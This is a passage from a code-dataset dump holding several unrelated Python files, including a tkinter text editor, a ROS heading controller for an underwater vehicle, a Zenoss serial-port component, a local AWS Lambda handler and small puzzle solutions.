print(\"ERROR: '{0}' sent return code {1}:\".format(\" \".join(fetches_command), p.returncode))\n print(p.stdout)\n\n if verbose:\n print(\"{0}/{1} {2} {3}written.\".format(i+1, len(etopo_gdf), os.path.split(mar_tile_fname)[1], \"\" if os.path.exists(mar_tile_fname) else \"NOT \"))\n\n return\n\n\nif __name__ == \"__main__\":\n mar = source_dataset_MAR_gravity()\n mar.fetch_tiles(resolution_s=15)\n mar.fetch_tiles(resolution_s=1)\n","repo_name":"ciresdem/ETOPO","sub_path":"src/datasets/MAR_gravity/source_dataset_MAR_gravity.py","file_name":"source_dataset_MAR_gravity.py","file_ext":"py","file_size_in_byte":3681,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"2431799565","text":"import tkinter as 
tk\nfrom tkinter import filedialog\nfrom tkinter import messagebox\n# from tkinter import a\n\n\nclass Menubar:\n\n def __init__(self,parent):\n font_specs = (\"ubuntu\",14)\n menubar = tk.Menu(parent.master,font = font_specs) #passing the window\n parent.master.config(menu = menubar)\n\n file_dropdown = tk.Menu(menubar,font = font_specs,tearoff = 0) # tearoff = 0 so that the menu cannot be torn off the window\n file_dropdown.add_command(label = \"New File\",accelerator = \"Ctrl+N\",command = parent.new_file)\n file_dropdown.add_command(label = \"Open File\",accelerator = \"Ctrl+O\",command = parent.open_file)\n file_dropdown.add_command(label = \"Save File\",accelerator = \"Ctrl+S\",command = parent.save)\n file_dropdown.add_command(label = \"Save As\",accelerator = \"Ctrl+Shift+S\",command = parent.saveas )\n file_dropdown.add_separator()\n file_dropdown.add_command(label = \"Exit\",command = parent.master.destroy)\n\n menubar.add_cascade(label = \"Basic\", menu = file_dropdown)\n\n\n about_dropdown = tk.Menu(menubar,font = font_specs,tearoff = 0)\n about_dropdown.add_command(label = \"Source code\",command = self.sour_cecoed)\n about_dropdown.add_separator()\n about_dropdown.add_command(label = \"About\",command = self.show_abtmenu)\n\n menubar.add_cascade(label = \"About\", menu = about_dropdown)\n\n def show_abtmenu(self):\n box_title = \"This is a Patra 1.01\"\n box_message = \"Multithreading is still pending\"\n messagebox.showinfo(box_title,box_message)\n\n def sour_cecoed(self):\n box_title = \"Currently a private project\"\n box_message = \"Not yet available\"\n messagebox.showinfo(box_title, box_message)\n\n\nclass Statubar:\n def __init__(self,parent):\n self.status = tk.StringVar()\n self.status.set(\"Patra - 0.1 contain\")\n font_specs = (\"ubuntu\", 14)\n\n\n label = tk.Label(parent.textarea , textvariable = self.status , fg = \"black\" , bg = \"lightgrey\",anchor = 'sw',font = font_specs)\n label.pack(side = tk.BOTTOM , fill = tk.BOTH)\n def update_status(self,*args):\n if isinstance(args[0],bool):\n self.status.set(\" You just saved your ass !\")\n else:\n self.status.set(\"Patra - 0.1 contain !\")\n\n\nclass Command:\n def __init__(self,parent):\n self.status = tk.StringVar()\n self.status.set(\"i\")\n font_specs = (\"ubuntu\", 14)\n\n\n label = tk.Label(parent.textarea , textvariable = self.status , fg = \"black\" , bg = \"lightgrey\",anchor = 'sw',font = font_specs)\n label.pack(side = tk.BOTTOM , fill = tk.BOTH)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n#parent class\nclass Pytest:\n def __init__(self,master):\n\n\n master.title(\"Untitled - No Name\")\n master.geometry(\"1200x700\")\n\n\n\n font_specs = (\"ubuntu\",18)\n\n self.master = master # access master in Child class Menubar\n\n self.filename = None\n\n\n self.textarea = tk.Text(master,font = font_specs)\n self.scroll = tk.Scrollbar(master,command = self.textarea.yview)\n self.textarea.configure(yscrollcommand = self.scroll.set)\n self.textarea.pack(side = tk.LEFT,fill = tk.BOTH,expand = True)\n self.scroll.pack(side = tk.RIGHT,fill = tk.Y)\n\n self.menubar = Menubar(self) # gone in init\n self.statusbar = Statubar(self)\n self.commandbar = Command(self)\n self.bind_shortcuts()\n\n # set window title?\n\n def set_window_title(self,name = None):\n if name:\n # self.filename = nme\n self.master.title(name+ \" -Patra1.01\")\n else:\n self.master.title(\"Untitled \"+ \" -Patra1.01\")\n\n\n\n\n\n\n def new_file(self,*args):\n print(\"reached new\")\n print(*args)\n self.textarea.delete(1.0, tk.END) # clear the text area\n self.filename = None\n 
self.set_window_title()\n\n\n # def open_file(self):\n # self.filename = filedialog.askopenfile(\n # defaultextension = \".txt\",\n # filetypes = [(\"All Files\",\"*.*\"),(\"Text Files\",\"*.txt\"),(\"Python Files\",\"*.py\"),(\"C Files\",\"*.c\"),(\"C++ Files\",\"*.cpp\")],\n #\n #\n # )\n # print(\"open\")\n # if self.filename:\n # self.textarea.delete(1.0,tk.END) #clear shit\n # print(self.filename)\n # with open(self.filename, \"r\") as f:\n # self.textarea.insert(1.0,f.read())\n # self.set_window_title(self.filename)\n #\n def open_file(self,*args):\n self.filename = filedialog.askopenfilename(\n defaultextension=\".txt\",\n filetypes=[(\"All Files\", \"*.*\"),\n (\"Text Files\", \"*.txt\"),\n (\"Python Scripts\", \"*.py\"),\n (\"Markdown Documents\", \"*.md\"),\n (\"JavaScript Files\", \"*.js\"),\n (\"HTML Documents\", \"*.html\"),\n (\"CSS Documents\", \"*.css\")])\n if self.filename:\n self.textarea.delete(1.0, tk.END)\n with open(self.filename, \"r\") as f:\n self.textarea.insert(1.0, f.read())\n self.set_window_title(self.filename)\n\n def save(self,*args):\n print(\"Ok\")\n if self.filename:\n try:\n\n txtara_contn = self.textarea.get(1.0,tk.END)\n with open(self.filename,\"w\") as g1:\n g1.write(txtara_contn)\n self.statusbar.update_status(True)\n except Exception as e:\n print(e)\n\n else:\n self.saveas()\n\n\n\n def saveas(self,*args):\n\n print(\"bnirht\")\n try:\n new_file1 = filedialog.asksaveasfilename(\n initialfile = \"Noname.txt\",\n defaultextension=\".txt\",\n filetypes=[(\"All Files\", \"*.*\"), (\"Text Files\", \"*.txt\"), (\"Python Files\", \"*.py\"), (\"C Files\", \"*.c\"),\n (\"C++ Files\", \"*.cpp\")],\n\n )\n textarea_contnt = self.textarea.get(1.0,tk.END) #get what over you wrote\n with open(new_file1,\"w\") as f1:\n f1.write(textarea_contnt)\n self.filename = new_file1\n self.statusbar.update_status(True)\n\n self.set_window_title(self.filename)\n\n\n\n\n except Exception as e:\n print(e)\n\n\n\n def bind_shortcuts(self):\n self.textarea.bind('',self.new_file)\n self.textarea.bind('',self.open_file)\n self.textarea.bind('',self.save)\n self.textarea.bind('',self.saveas)\n self.textarea.bind('',self.statusbar.update_status)\n\n\n\n\n\n\nif __name__== \"__main__\":\n master = tk.Tk()\n pt = Pytest(master)\n master.mainloop()\n # master.\n","repo_name":"Stenardt-9002/Patra-texteditor","sub_path":"Patra2/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":6741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28465694793","text":"#!/usr/bin/python\n\n\"\"\"\nA heading controller for the AUV when moving on a horizontal plane based-on PI-D strategy\n\n# Notes\n-control surface may not functioning correctly as the gains has not been tested yet\n\n######################################\n#Modifications\n2/2/2015: implement PI-D strategy instead of PID to avoid the spike in derivative term when change the demand. 
Correspondingly, D_gain has to be negative.\n5/4/2015: make sure CS and thruster demands are Integer32\n21/9/2015: added speed observer\n\n# TODO \n- check if the sway force distribution has been done correctly\n- include actuator transition according to surge speed\n- move speed observer to dead_reckoner\n\n\"\"\"\n\nimport rospy\nimport time\nimport numpy\nfrom hardware_interfaces.msg import tsl_setpoints\nfrom hardware_interfaces.msg import tail_setpoints\nfrom hardware_interfaces.msg import compass\nfrom lowlevel_controllers.msg import heading_control_PID\nfrom std_msgs.msg import Float32\nfrom std_msgs.msg import Int8\nfrom std_msgs.msg import String\nfrom hardware_interfaces.msg import status\n\nfrom delphin2_mission.utilities import uti\n\n################################################################################\n#### CONTROLLER PARAMETERS #####################################################\n################################################################################\n\ndef set_params():\n global HC\n global Ltf\n global Ltr\n global myUti\n global timeLastDemandMax\n global timeLastCallback\n global timeLastDemandProp\n global timeLastDemandProp_lim\n \n timeLastDemandMax = 1 # [sec] if there is no onOff flag updated within this many seconds, controller will be turned off\n timeLastCallback = time.time()\n timeLastDemandProp = time.time()\n timeLastDemandProp_lim = 1 # [sec] if there is no propeller demand update within this many seconds, the demand will be set to zero\n\n ### General ###\n HC.deadzone = 0 # deadzone of the heading error [degree]\n \n ### CS Controller ###\n HC.CS_Pgain = 8. # FIXME: tune me kantapon\n HC.CS_Igain = 0\n HC.CS_Dgain = -13. # D gain has to be negative (c.f. PI-D), FIXME: tune me kantapon\n HC.CS_Smax = 30\n \n ### Thrust Controller ###\n HC.Thrust_Pgain = rospy.get_param(\"horizontal/thruster/Pgain\")\n HC.Thrust_Igain = rospy.get_param(\"horizontal/thruster/Igain\")\n HC.Thrust_Dgain = rospy.get_param(\"horizontal/thruster/Dgain\") # -30000.00 # D gain has to be negative (c.f. 
PI-D)\n HC.Thrust_Smax = rospy.get_param(\"thruster/SetpointMax\") # 1000 # maximum thruster setpoint\n\n ### Utility Object ###\n myUti = uti()\n \n # determine relative arm lengths for thrust allocation\n L_th = 1.24 # distance between two horizontal thrusters [metre]: measured\n cr = 1.05 # center of rotation on horizontal plane from the AUV nose [metre]: trial-and-error\n Ltf_nose = 0.205 # location of the front horizontal thruster from nose: measured\n Ltf = cr-Ltf_nose # Moment arm of front horizontal thruster from the cr [metre]\n Ltr = L_th-Ltf # Moment arm of rear horizontal thruster from the cr [metre]\n\n################################################################################\n#### CONTROL SURFACE CONTROLLER ################################################\n################################################################################\n\ndef CS_controller(error, int_error, der_error):\n global HC\n HC.CS_Pterm = error*HC.CS_Pgain\n HC.CS_Iterm = int_error*HC.CS_Igain\n HC.CS_Dterm = der_error*HC.CS_Dgain\n\n CS_demand = HC.CS_Pterm + HC.CS_Iterm + HC.CS_Dterm\n CS_demand = myUti.limits(CS_demand,-HC.CS_Smax,HC.CS_Smax)\n \n HC.CS_demand = int(round(CS_demand))\n\n return HC.CS_demand\n \n################################################################################\n########## THRUST CONTROLLER ###################################################\n################################################################################\n\ndef thrust_controller(error, int_error, der_error):\n global HC\n \n if numpy.abs(error) > HC.deadzone:\n \n HC.Thrust_Pterm = error*HC.Thrust_Pgain\n HC.Thrust_Iterm = int_error*HC.Thrust_Igain\n HC.Thrust_Dterm = der_error*HC.Thrust_Dgain\n \n HC.Thrust_heading = HC.Thrust_Pterm + HC.Thrust_Iterm + HC.Thrust_Dterm\n \n ## turn torque into thrust and superposition with sway demand\n thruster0 = float(HC.Thrust_heading)/float(Ltf+Ltr) + float(HC.sway_demand)*float(Ltr)/float(Ltf+Ltr)\n thruster1 = -float(HC.Thrust_heading)/float(Ltf+Ltr) + float(HC.sway_demand)*float(Ltf)/float(Ltf+Ltr)\n \n thruster0 = numpy.sign(thruster0)*(numpy.abs(thruster0))**0.5 # according to a relationship between thrust and rpm\n thruster1 = numpy.sign(thruster1)*(numpy.abs(thruster1))**0.5 # according to a relationship between thrust and rpm\n\n # if a setpoint of one thruster goes beyond the limit. 
it will be saturated and the other one will be scaled down proportionally in order to scale down torque.\n thruster0 = round(thruster0)\n thruster1 = round(thruster1)\n if numpy.abs(thruster0) > HC.Thrust_Smax:\n scale_factor = float(HC.Thrust_Smax)/float(numpy.abs(thruster0))\n thruster0 = thruster0*scale_factor\n thruster1 = thruster1*scale_factor\n if numpy.abs(thruster1) > HC.Thrust_Smax:\n scale_factor = float(HC.Thrust_Smax)/float(numpy.abs(thruster1))\n thruster0 = thruster0*scale_factor \n thruster1 = thruster1*scale_factor\n\n else:\n HC.Thrust_Pterm = 0.\n HC.Thrust_Dterm = 0.\n thruster0 = 0.\n thruster1 = 0.\n \n HC.thruster0 = int(round(thruster0))\n HC.thruster1 = int(round(thruster1))\n \n return [HC.thruster0, HC.thruster1]\n\n################################################################################\n########## MAIN CONTROL LOOP ###################################################\n################################################################################\n\ndef main_control_loop():\n\n #### SETUP ####\n global controller_onOff\n global speed\n global HC\n global propDemand\n\n propDemand = 0\n speed = 0\n controller_onOff = False\n set_params()\n\n controlRate = 5. # [Hz]\n r = rospy.Rate(controlRate)\n controlPeriod = 1/controlRate # [sec]\n \n [error, int_error, der_error] = system_state(-1,HC.heading,(HC.heading_demand)%360) # On first loop, initialize relevant parameters\n \n # to control a timing for status publishing\n timeZero_status = time.time()\n try:\n dt_status = rospy.get_param('status_timing')\n except:\n dt_status = 2.\n \n while not rospy.is_shutdown():\n # to control a timing for status publishing\n if time.time()-timeZero_status > dt_status:\n timeZero_status = time.time()\n pubStatus.publish(nodeID = 7, status = True)\n \n timeRef = time.time() \n \n if time.time()-timeLastDemandProp > timeLastDemandProp_lim:\n propDemand = 0\n try:\n speed_current = speedObserver(propDemand, speed, controlPeriod)\n speed = speed_current\n HC.speed = speed\n except:\n speed_current = 0\n speed = speed_current\n HC.speed = speed\n\n if controller_onOff == True:\n # get sampling\n heading_current = HC.heading\n heading_demand = (HC.heading_demand)%360\n \n # Get system state #\n [error, int_error, der_error] = system_state(controlPeriod,heading_current,heading_demand)\n\n # Control Surface Controller # Nb CSp = Sternplane port, CSt = Rudder top\n CS_demand = CS_controller(error, int_error, der_error)\n # Thruster controller # \n [thruster0, thruster1] = thrust_controller(error, int_error, der_error)\n \n # update the heading_control_PID.msg, and this will be subscribed by the logger.py\n pub_tail.publish(cs0 =CS_demand, cs1 = CS_demand)\n pub_tsl.publish(thruster0 = thruster0, thruster1 = thruster1)\n pub_HC.publish(HC)\n \n # watch to inactivate the controller when there is no demand specified\n if time.time()-timeLastCallback > timeLastDemandMax:\n controller_onOff = False\n else:\n HC.CS_demand = 0\n HC.thruster0 = 0\n HC.thruster1 = 0\n pub_HC.publish(HC)\n \n # verify and maintain the control rate\n timeElapse = time.time()-timeRef \n if timeElapse < controlPeriod:\n r.sleep()\n else:\n str = \"Heading control rate does not meet the desired value of %.2fHz: actual control rate is %.2fHz\" %(controlRate,1/timeElapse) \n rospy.logwarn(str)\n pubMissionLog.publish(str)\n\n################################################################################\n######## CALCULATE CURRENT SYSTEM STATES 
#######################################\n################################################################################\n\ndef system_state(dt,heading_current,heading_demand):\n global HC\n global int_error\n global sample\n\n if dt == -1:\n sample = numpy.zeros(2)\n error = 0\n int_error = 0\n der_sample = 0\n else:\n ### ERROR ###\n error = myUti.computeHeadingError(heading_demand,heading_current)\n ### INTEGRAL ###\n int_error += dt*error\n ### DERIVATIVE ###\n # PI-D strategy (compute the derivative of only the current heading)\n sample[1] = sample[0]\t # Shift old values up in the array\n sample[0] = heading_current \t\t # Set first array term to new error value\n der_sample = myUti.computeHeadingError(sample[0],sample[1])/dt # compute error of the sample\n\n # update the error terms. These will be subscribed by the logger node.\n der_error = der_sample # consider the derivative of sample as the derivative of the error (c.f. PI-D strategy)\n\n HC.error = error\n HC.int_error = int_error\n HC.der_error = der_error\n\n return [error, int_error, der_error]\n\n################################################################################\n######## UPDATE PARAMETERS FROM TOPICS #########################################\n################################################################################\n\ndef heading_demand_cb(headingd):\n global HC\n global controller_onOff\n global timeLastCallback\n HC.heading_demand = headingd.data\n controller_onOff = True\n timeLastCallback = time.time()\n \ndef sway_demand_cb(swaydemand):\n global HC\n HC.sway_demand = swaydemand.data\n\ndef compass_cb(compass):\n global HC\n HC.heading = compass.heading\n \n################################################################################\n######## SPEED OBSERVER ########################################################\n################################################################################\n\ndef prop_demand_callback(propd):\n global propDemand\n global timeLastDemandProp\n propDemand = propd.data\n timeLastDemandProp = time.time()\n\ndef propeller_model(u_prop,_speed):\n if numpy.abs(u_prop)<10: # deadband\n F_prop = 0\n else:\n # propeller model based on Turnock2010 e.q. 
16.19\n Kt0 = 0.1003\n a = 0.6952\n b = 1.6143\n w_t = 0.36 # wake fraction\n t = 0.11 # thrust deduction\n D = 0.305 # propeller diameter [m]\n rho = 1000 # water density [kg/m^3]\n \n rps = 0.2748*u_prop - 0.1657 # infer propeller rotation speed from the propeller demand [rps]\n \n J = _speed *(1-w_t)/rps/D;\n Kt = Kt0*(1 - (J/a)**b );\n F_prop = rho*rps**2*D**4*Kt*(1-t);\n\n return F_prop\n\ndef rigidbodyDynamics(_speed,F_prop):\n m = 79.2 # mass of the AUV [kg]\n X_u_dot = -3.46873716858361 # added mass of the AUV [kg]\n X_u = -16.2208 # linear damping coefficient [kg/s]\n X_uu = -1.2088 # quadratic damping coefficient [kg/m]\n \n acc = (X_u*_speed + X_uu*abs(_speed)*_speed + F_prop)/(m-X_u_dot)\n \n return acc\n \ndef speedObserver(u_prop,_speed,dt):\n # compute force from a propeller demand\n F_prop = propeller_model(u_prop,_speed)\n # implement Runge-Kutta 4th order to update the AUV speed\n k1 = rigidbodyDynamics(_speed,F_prop)\n k2 = rigidbodyDynamics(_speed+dt/2.*k1,F_prop)\n k3 = rigidbodyDynamics(_speed+dt/2.*k2,F_prop)\n k4 = rigidbodyDynamics(_speed+dt*k3,F_prop)\n\n speed_change = dt/6.*(k1+2*k2+2*k3+k4)\n _speed = _speed + speed_change\n return _speed\n \n################################################################################\n######## INITIALISATION ########################################################\n################################################################################\n\nif __name__ == '__main__':\n rospy.init_node('Heading_controller')\n \n global HC\n HC = heading_control_PID()\n \n rospy.Subscriber('heading_demand', Float32, heading_demand_cb)\n rospy.Subscriber('sway_demand', Float32, sway_demand_cb)\n rospy.Subscriber('compass_out', compass, compass_cb)\n rospy.Subscriber('prop_demand', Int8, prop_demand_callback)\n \n pub_tsl = rospy.Publisher('TSL_setpoints_horizontal', tsl_setpoints)\n pub_tail = rospy.Publisher('tail_setpoints_vertical', tail_setpoints)\n pub_HC = rospy.Publisher('Heading_controller_values_PID', heading_control_PID)\n pubMissionLog = rospy.Publisher('MissionStrings', String)\n pubStatus = rospy.Publisher('status', status)\n \n rospy.loginfo(\"Heading controller online\")\n\n main_control_loop()\n","repo_name":"Southampton-Maritime-Robotics/DelphinROSv3","sub_path":"src/lowlevel_controllers/scripts/heading_controller_PID.py","file_name":"heading_controller_PID.py","file_ext":"py","file_size_in_byte":13958,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
{"seq_id":"38573216648","text":"###############################################################################\n#\n# SerialPort object class\n#\n###############################################################################\n\n__doc__ = \"\"\" SerialPort\n\nSerialPort is a component of a SerialConsoleDevice\n\n$id: $\"\"\"\n\n__version__ = \"$Revision: 1.3 $\"[11:-2]\n\nfrom Globals import InitializeClass\n# from AccessControl import ClassSecurityInfo\n\nfrom Products.ZenRelations.RelSchema import *\nfrom Products.ZenModel.DeviceComponent import DeviceComponent\nfrom Products.ZenModel.ManagedEntity import ManagedEntity\nfrom Products.ZenUtils.Utils import convToUnits\n\nfrom Products.ZenModel.ZenossSecurity import ZEN_VIEW, ZEN_CHANGE_SETTINGS\n\n_kw = dict(mode='w')\n\nclass SerialPort(DeviceComponent, ManagedEntity):\n \"\"\" Serial console on an Opengear device\n\n \"\"\"\n\n portal_type = meta_type = 'SerialPort'\n\n #serialPortIndex = -1\n serialPortNumber = 0\n serialPortLabel = \"\"\n serialPortMode = \"\"\n 
serialPortLoglevel = 0\n serialPortSpeed = 0\n serialPortCharsize = 0\n serialPortStop = 0\n serialPortParity = \"\"\n serialPortFlowcontrol = \"\"\n serialPortProtocol = \"\"\n serialPortTerminal = \"\"\n serialPortSsh = False\n serialPortTelnet = False\n serialPortRfc2217 = False\n serialPortRawtcp = False\n serialPortModeSummary = \"\"\n serialPortSettingSummary = \"\"\n\n ogSerialPortStatusIndex = -1\n ogSerialPortStatusPort = 0\n ogSerialPortStatusRxBytes = 0\n ogSerialPortStatusTxBytes = 0\n ogSerialPortStatusSpeed = 0\n ogSerialPortStatusDCD = 0\n ogSerialPortStatusDTR = 0\n ogSerialPortStatusDSR = 0\n ogSerialPortStatusCTS = 0\n ogSerialPortStatusRTS = 0\n #dcd = False\n #dtr = False\n #dsr = False\n #cts = False\n #rts = False\n\n snmpindex = -1\n\n _properties = (\n #dict(id = 'snmpindex', type = 'int', **_kw),\n dict(id = 'serialPortNumber', type = 'int', **_kw),\n dict(id = 'serialPortLabel', type = 'string', **_kw),\n dict(id = 'serialPortMode', type = 'string', **_kw),\n dict(id = 'serialPortLoglevel', type = 'int', **_kw),\n dict(id = 'serialPortSpeed', type = 'int', **_kw),\n dict(id = 'serialPortCharsize', type = 'int', **_kw),\n dict(id = 'serialPortStop', type = 'int', **_kw),\n dict(id = 'serialPortParity', type = 'string', **_kw),\n dict(id = 'serialPortFlowcontrol', type = 'string', **_kw),\n dict(id = 'serialPortProtocol', type = 'string', **_kw),\n dict(id = 'serialPortTerminal', type = 'string', **_kw),\n dict(id = 'serialPortSsh', type = 'boolean', **_kw),\n dict(id = 'serialPortTelnet', type = 'boolean', **_kw),\n dict(id = 'serialPortRfc2217', type = 'boolean', **_kw),\n dict(id = 'serialPortRawtcp', type = 'boolean', **_kw),\n dict(id = 'serialPortModeSummary', type = 'string', **_kw),\n dict(id = 'serialPortSettingSummary',type = 'string', **_kw),\n dict(id = 'ogSerialPortStatusIndex', type = 'int', **_kw),\n dict(id = 'ogSerialPortStatusPort', type = 'int', **_kw),\n dict(id = 'ogSerialPortStatusRxBytes', type = 'int',\t **_kw),\n dict(id = 'ogSerialPortStatusTxBytes', type = 'int',\t **_kw),\n dict(id = 'ogSerialPortStatusSpeed', type = 'int', **_kw),\n dict(id = 'ogSerialPortStatusDCD', type = 'int', **_kw),\n dict(id = 'ogSerialPortStatusDTR', type = 'int', **_kw),\n dict(id = 'ogSerialPortStatusDSR', type = 'int', **_kw),\n dict(id = 'ogSerialPortStatusCTS', type = 'int', **_kw),\n dict(id = 'ogSerialPortStatusRTS', type = 'int', **_kw),\n #dict(id = 'dcd', type = 'boolean', **_kw),\n #dict(id = 'dtr', type = 'boolean', **_kw),\n #dict(id = 'dsr', type = 'boolean', **_kw),\n #dict(id = 'cts', type = 'boolean', **_kw),\n #dict(id = 'rts', type = 'boolean', **_kw),\n )\n\n _relations = (\n ('SerialConsoleDev', ToOne(ToManyCont,\n 'ZenPacks.Opengear.ConsoleServer.SerialConsoleDevice',\n 'SerialPrt')),\n )\n\n # Screen action bindings (and tab definitions)\n factory_type_information = ({\n 'id' : 'SerialPort',\n 'meta_type' : 'SerialPort',\n 'description' : 'Opengear Serial Port',\n 'icon' : 'Device_icon.gif',\n 'product' : 'ConsoleServer',\n 'factory' : 'manage_addSerialPort',\n 'immediate_view' : 'serialPortPerformance',\n 'actions' : ({\n 'id' : 'perf',\n 'name' : 'perf',\n 'action' : 'serialPortPerformance',\n 'permissions' : (ZEN_VIEW, )\n }, {\n 'id' : 'templates',\n 'name' : 'Templates',\n 'action' : 'objTemplates',\n 'permissions' : (ZEN_CHANGE_SETTINGS, )\n },)\n },)\n\n def device(self):\n return self.SerialConsoleDev()\n\n def managedDeviceLink(self):\n from Products.ZenModel.ZenModelRM import ZenModelRM\n d = 
self.getDmdRoot(\"Devices\").findDevice(self.serialPortLabel)\n if d:\n return ZenModelRM.urlLink(d, 'link')\n return None\n\n def getPerformanceLink(self):\n from Products.ZenModel.ZenModelRM import ZenModelRM\n d = self.getDmdRoot(\"Devices\").findDevice(self.serialPortLabel)\n if d:\n return ZenModelRM.urlLink(d, 'link')\n return None\n\n def snmpIgnore(self):\n return ManagedEntity.snmpIgnore(self) or self.snmpindex < 0\n\nInitializeClass(SerialPort)\n","repo_name":"zenoss/Community-Zenpacks","sub_path":"ZenPacks.Opengear.ConsoleServer/ZenPacks/Opengear/ConsoleServer/SerialPort.py","file_name":"SerialPort.py","file_ext":"py","file_size_in_byte":5883,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"72"} +{"seq_id":"31643539924","text":"import time\n\"\"\"\n#this code works but takes a long time to calculate\n#the actual solution is purely mathematical.\ndict = {1: []}\ndef main():\n maximum = 0\n maxNum = 1\n limit = 1000000\n for n in range(2, limit + 1):\n print(n)\n if n not in dict.keys():\n newDict = {}\n for num in dict.keys():\n i = 1\n res = num * (n ** i)\n while res <= limit:\n newDict[res] = list(dict[num])\n newDict[res].append(n)\n i += 1\n res = num * (n ** i)\n keys = list(newDict.keys())\n for j in range(len(keys)):\n dict[keys[j]] = newDict[keys[j]]\n if n / (n - getNumOfCommons(dict[n], n) - 1) > maximum:\n maxNum = n\n maximum = n / (n - getNumOfCommons(dict[n], n) - 1)\n #print(f\"n: {n}\\t{maximum}\")\n print(f\"maxNum: {maxNum}\\tvalue: {maximum}\")\n\ndef getNumOfCommons(list, n):\n sum = 0\n for i in range(len(list)):\n sum += int(n / list[i]) - 1\n for i in range(len(list)):\n for j in range(i + 1, len(list)):\n sum -= int(n / (list[i] * list[j])) - 1\n return sum\n\n\"\"\"\ndef main():\n n = 1\n k = 0\n primes = [2, 3, 5, 7, 11, 13, 17, 19, 21, 23, 29, 31]\n while primes[k] * n <= 1000000:\n n *= primes[k]\n k += 1\n print(n)\n\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"Penjo989/Project-Euler","sub_path":"10/69.py","file_name":"69.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"817656999","text":"class Solution:\n def findSubsequences(self, nums: List[int]) -> List[List[int]]:\n ## RC ##\n ## APPROACH : BACKTRACKING ##\n\n ## TIME COMPLEXITY : O(N^2) ##\n ## SPACE COMPLEXITY : O(N^2) ##\n\n def backtrack(curr, nums):\n if (len(curr) >= 2 and curr[-1] < curr[-2]): return\n if (len(curr) >= 2 and curr[:] not in result):\n result.add(curr[:])\n for i in range(len(nums)):\n backtrack(curr + (nums[i],), nums[i + 1:]) # using tuples for curr instead of list\n\n result = set()\n backtrack((), nums)\n return result","repo_name":"ahmaddroobi99/ProblemSolving","sub_path":"increasing-subsequences.py","file_name":"increasing-subsequences.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"19020566981","text":"import h5py\nimport sys\nimport numpy\n\nfile_in = sys.argv[1]\nfile_out = sys.argv[2]\n\nfh_in = h5py.File(file_in, 'r')\ndata_in = fh_in['/data/data'][:]\nfh_in.close()\n\ndata_out = numpy.zeros((16*128, 512), dtype=numpy.int16)\n\nfor p_num in range(0, 16):\n\n print('Converting panel:', p_num)\n\n p_in = data_in[\n 512 * p_num:\n 512 * (p_num + 1),\n\n 0:128\n ]\n\n p_out = data_out[\n 128 * p_num:\n 128 * (p_num + 1),\n\n 0:512\n ]\n\n for y in range(0, 128):\n for x in range(0, 512):\n p_out[y,x] 
= p_in[x,y]\n\nfh_out = h5py.File(file_out, 'w')\nfh_out.create_dataset('/data/data', data=data_out)\nprint('Done!')","repo_name":"valmar/om-configuration-archive","sub_path":"onda-wang-xfel2114-2018-september/cheetah_onda_mask_converter.py","file_name":"cheetah_onda_mask_converter.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20249237840","text":"import json\nimport os\nfrom log import logger\n\nimport boto3\n\ndynamodb = boto3.client('dynamodb', endpoint_url='http://dynamodb:8000')\nsqs = boto3.client('sqs', endpoint_url='http://localstack:4576/')\n\ndef lambda_handler(event, context):\n response = dynamodb.put_item(\n TableName='example',\n Item={\n 'id': {'S': 'ABC'},\n 'name': {'S': 'jayground'}\n }\n )\n logger.info(response)\n\n response = sqs.send_message(\n QueueUrl=os.environ.get('QUEUE_URL', \"http://localhost:4576/queue/exSQS\"),\n MessageBody='Serverless black belt!'\n )\n\n logger.info(response)\n\n return {\n \"statusCode\": 201,\n \"body\": json.dumps({'msg': 'success to put item'})\n }","repo_name":"jaemyunlee/playground","sub_path":"09-black-belt-for-sam-local/lambda2/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13423968182","text":"\nclass FitTrackPoint(object):\n def __init__(self, frame):\n self.value = self.get_single_point_data(frame)\n\n def get_single_point_data(self, frame):\n data = dict()\n if not(frame.has_field('position_lat') and frame.has_field('position_long')):\n return None\n latitude = frame.get_value('position_lat')\n longitude = frame.get_value('position_long')\n if (latitude is None) or (longitude is None):\n return None\n data[\"latitude\"] = latitude\n data[\"longitude\"] = longitude\n return data\n","repo_name":"bartvanherck/sportstatistics","sub_path":"fitness/fittrackpoint.py","file_name":"fittrackpoint.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70579538153","text":"import numpy as np\nimport wandb\nfrom loguru import logger\n\nfrom utils.utils import test, initWandb\n\n\nclass Training:\n\n def __init__(self, args, net_glob, dataset_train, dataset_test, dict_users):\n\n self.round = 0\n self.args = args\n self.net_glob = net_glob\n self.net_glob.train()\n self.dataset_train = dataset_train\n self.dataset_test = dataset_test\n self.dict_users = dict_users\n\n self.acc_list = []\n self.acc = 0\n self.loss = 0\n self.max_avg = 0\n self.max_std = 0\n\n self.traffic = 0\n\n if args.wandb:\n initWandb(args)\n\n def test(self):\n self.acc, self.loss = test(self.net_glob, self.dataset_test, self.args)\n self.acc_list.append(self.acc)\n temp = self.acc_list[max(0, len(self.acc_list) - 10)::]\n avg = np.mean(temp)\n if avg > self.max_avg:\n self.max_avg = avg\n self.max_std = np.std(temp)\n\n def log(self):\n logger.info(\n \"Round{}, acc:{:.2f}, max_avg:{:.2f}, max_std:{:.2f}, loss:{:.2f}, comm:{:.2f}MB\",\n self.round, self.acc, self.max_avg, self.max_std,\n self.loss, (self.traffic / 1024 / 1024))\n if self.args.wandb:\n wandb.log({\"round\": self.round, 'acc': self.acc, 'max_avg': 